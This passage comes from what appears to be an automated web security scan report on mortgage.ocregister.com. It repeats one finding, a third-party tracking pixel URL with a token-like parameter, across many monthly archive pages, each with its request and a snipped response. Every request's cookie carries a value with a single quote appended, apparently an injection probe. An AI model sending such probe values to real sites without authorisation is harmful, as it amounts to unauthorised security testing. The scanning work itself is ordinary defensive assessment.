Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.13. http://mortgage.ocregister.com/2008/01/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/01/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.14. http://mortgage.ocregister.com/2008/02/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/02/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.15. http://mortgage.ocregister.com/2008/03/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/03/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.16. http://mortgage.ocregister.com/2008/04/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/04/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.17. http://mortgage.ocregister.com/2008/05/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/05/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.18. http://mortgage.ocregister.com/2008/06/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/06/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.19. http://mortgage.ocregister.com/2008/07/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/07/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.20. http://mortgage.ocregister.com/2008/08/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/08/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.21. http://mortgage.ocregister.com/2008/09/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/09/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 111978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.22. http://mortgage.ocregister.com/2008/10/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/10/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.23. http://mortgage.ocregister.com/2008/11/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/11/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.24. http://mortgage.ocregister.com/2008/12/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2008/12/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2008/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.25. http://mortgage.ocregister.com/2009/01/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/01/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.26. http://mortgage.ocregister.com/2009/02/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/02/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.27. http://mortgage.ocregister.com/2009/03/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/03/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.28. http://mortgage.ocregister.com/2009/04/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/04/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.29. http://mortgage.ocregister.com/2009/05/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/05/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.30. http://mortgage.ocregister.com/2009/06/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2009/06/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2009/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

